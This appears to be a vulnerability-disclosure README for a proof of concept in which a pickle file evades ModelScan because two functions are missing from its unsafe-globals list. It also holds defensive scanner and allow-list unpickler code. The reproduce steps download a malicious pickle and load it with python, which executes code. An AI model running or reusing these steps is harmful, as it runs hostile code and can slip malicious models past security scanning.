ModelScan importlib + methodcaller Bypass PoC

This repo contains a proof-of-concept pickle file that bypasses ModelScan's PickleScan.

How to reproduce

# Download the malicious pickle
wget https://huggingface.co/xiaoyaoes/modelscan-importlib-bypass-poc/resolve/main/malicious.pkl

# ModelScan says it's clean
modelscan -p malicious.pkl

# But it executes code
python3 -c "import pickle; pickle.load(open('malicious.pkl','rb'))"

Detection gap

importlib.import_module and operator.methodcaller are both missing from ModelScan's unsafe_globals list, so a pickle that references them is not flagged.
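A defender-side illustration of the gap, added here and not taken from the PoC repo or from ModelScan's own source: a small static scanner built on pickletools.genops that lists every GLOBAL / STACK_GLOBAL / INST reference in a pickle stream without loading it, checks them against a deny-list that is assumed for this example (ModelScan's real list may differ) and includes the two names above, plus an allow-list unpickler as the stronger runtime control. The two sample pickles are constructed inline; the suspicious one only references the two functions and executes nothing, which is enough to exercise a scanner.

```python
"""Static and runtime checks for dangerous global references in a pickle stream.

Added example; assumptions: DENYLIST is an illustrative stand-in for a scanner's
unsafe_globals, ALLOWLIST is an illustrative minimal set for a model loader.
"""
import io
import pickle
import pickletools

# Assumed deny-list. The first rows are the usual suspects; the last two are
# the names this page reports as missing from ModelScan's unsafe_globals.
DENYLIST = {
    "builtins.eval", "builtins.exec", "builtins.getattr", "builtins.__import__",
    "os.system", "posix.system", "nt.system", "subprocess.Popen",
    "importlib.import_module",
    "operator.methodcaller",
}

# Opcodes that push a string constant; STACK_GLOBAL consumes the last two.
STRING_OPS = {"STRING", "BINSTRING", "SHORT_BINSTRING",
              "UNICODE", "BINUNICODE", "SHORT_BINUNICODE", "BINUNICODE8"}


def referenced_globals(data):
    """Return every 'module.name' the stream would import, without executing it."""
    found = []
    recent = []  # string constants seen so far; heuristic stack for STACK_GLOBAL
    for opcode, arg, _pos in pickletools.genops(data):
        if opcode.name in ("GLOBAL", "INST"):
            module, name = arg.split(" ", 1)  # genops yields "module name"
            found.append(f"{module}.{name}")
        elif opcode.name == "STACK_GLOBAL" and len(recent) >= 2:
            found.append(f"{recent[-2]}.{recent[-1]}")
        elif opcode.name in STRING_OPS:
            recent.append(arg)
    return found


def find_unsafe_globals(data):
    """Deny-list hits, in the order they appear in the stream."""
    return [g for g in referenced_globals(data) if g in DENYLIST]


# Assumed allow-list for the runtime check: a deny-list is always one missed
# name away from a bypass, so a loader should enumerate what it accepts.
ALLOWLIST = {
    "builtins": {"set", "frozenset", "slice", "range", "complex", "bytearray"},
    "collections": {"OrderedDict"},
}


class RestrictedUnpickler(pickle.Unpickler):
    """Refuse any global that is not explicitly allowed."""

    def find_class(self, module, name):
        if name in ALLOWLIST.get(module, ()):
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global {module}.{name} is not allowed")


def restricted_loads(data):
    return RestrictedUnpickler(io.BytesIO(data)).load()


def load_is_refused(data):
    """True if the allow-list unpickler rejects the stream."""
    try:
        restricted_loads(data)
    except pickle.UnpicklingError:
        return True
    return False


# Constructed samples (not the PoC file from the page).
BENIGN = pickle.dumps({"weights": [0.1, 0.2]}, protocol=4)

# Constructed protocol-4 stream that only references the two functions and
# then stops; loading it would return a function object and run nothing.
SUSPICIOUS = (
    b"\x80\x04"                                   # PROTO 4
    b"cimportlib\nimport_module\n"                # GLOBAL importlib import_module
    b"\x8c\x08operator\x8c\x0cmethodcaller\x93"   # STACK_GLOBAL operator methodcaller
    b"."                                          # STOP
)

if __name__ == "__main__":
    for label, blob in (("benign", BENIGN), ("suspicious", SUSPICIOUS)):
        print(label, "hits:", find_unsafe_globals(blob),
              "refused at load:", load_is_refused(blob))
```

The static pass mirrors what a scanner's deny-list can catch once the two names are added; the allow-list unpickler shows why a loader should not depend on that list being complete.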
